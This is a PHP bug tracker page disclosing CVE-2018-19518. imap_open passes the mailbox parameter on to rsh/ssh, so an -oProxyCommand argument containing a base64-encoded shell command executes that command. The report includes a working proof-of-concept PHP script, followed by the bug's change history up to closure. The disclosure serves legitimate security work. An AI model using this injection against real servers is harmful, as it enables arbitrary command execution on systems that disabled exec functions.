imap_open allows to run arbitrary shell commands via mailbox parameter
| Sec Bug #77153 | imap_open allows to run arbitrary shell commands via mailbox parameter | ||||
|---|---|---|---|---|---|
| Submitted: | 2018-11-14 17:54 UTC | Modified: | 2019-01-31 23:26 UTC | ||
| From: | azjezz at protonmail dot com | Assigned: | stas (profile) | ||
| Status: | Closed | Package: | IMAP related | ||
| PHP Version: | 5.6.38 | OS: | Debian-like ( debian / ubuntu ) | ||
| Private report: | No | CVE-ID: | 2018-19518 | ||
[2018-11-14 17:54 UTC] azjezz at protonmail dot com
Description: ------------ Bypassing disabled exec functions in PHP via imap_open (Debian & Ubuntu) this bug has already been made public : - https://antichat.com/threads/463395/#post-4254681 - https://github.com/Bo0oM/PHP_imap_open_exploit Test script: --------------- <?php # echo '1234567890'>/tmp/test0001 // $server = $_POST['server'] ??? $server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}"; imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());
Patches
Pull Requests
History
AllCommentsChangesGit/SVN commits
[2018-11-14 17:58 UTC] azjezz at protonmail dot com
-Operating System: Debin-like ( debin / ubuntu ) +Operating System: Debian-like ( debian / ubuntu )
[2018-11-14 17:58 UTC] azjezz at protonmail dot com
[2018-11-14 18:07 UTC] stas@php.net
[2018-11-14 18:08 UTC] stas@php.net
-Summary: bypass disabled exec function +Summary: imap_open allows to run arbitrary shell commands via mailbox parameter
[2018-11-14 19:11 UTC] stas@php.net
[2018-11-15 15:44 UTC] cmb@php.net
[2018-11-15 19:35 UTC] stas@php.net
[2018-11-15 20:00 UTC] stas@php.net
[2018-11-15 20:04 UTC] azjezz at protonmail dot com
-Summary: imap_open allows to run arbitrary shell commands via mailbox parameter +Summary: bypass disabled exec function
[2018-11-15 20:04 UTC] azjezz at protonmail dot com
[2018-11-15 20:07 UTC] azjezz at protonmail dot com
-Summary: bypass disabled exec function +Summary: imap_open allows to run arbitrary shell commands via mailbox parameter
[2018-11-15 20:07 UTC] azjezz at protonmail dot com
[2018-11-16 00:16 UTC] cmb@php.net
[2018-11-18 20:57 UTC] stas@php.net
-PHP Version: Irrelevant +PHP Version: 5.6.38
[2018-11-19 01:13 UTC] stas@php.net
[2018-11-19 01:13 UTC] stas@php.net
-Assigned To: +Assigned To: stas
[2018-11-19 21:08 UTC] stas@php.net
[2018-11-20 07:23 UTC] c dot r dot l dot f at yandex dot ru
[2018-11-20 07:27 UTC] c dot r dot l dot f at yandex dot ru
[2018-11-20 07:44 UTC] stas@php.net
[2018-11-21 01:54 UTC] stas@php.net
-Status: Assigned +Status: Closed
[2018-12-03 09:15 UTC] remi@php.net
-CVE-ID: needed +CVE-ID: 2018-19158
[2018-12-11 16:42 UTC] anarcat at debian dot org
[2019-01-31 23:26 UTC] stas@php.net
-CVE-ID: 2018-19158 +CVE-ID: 2018-19518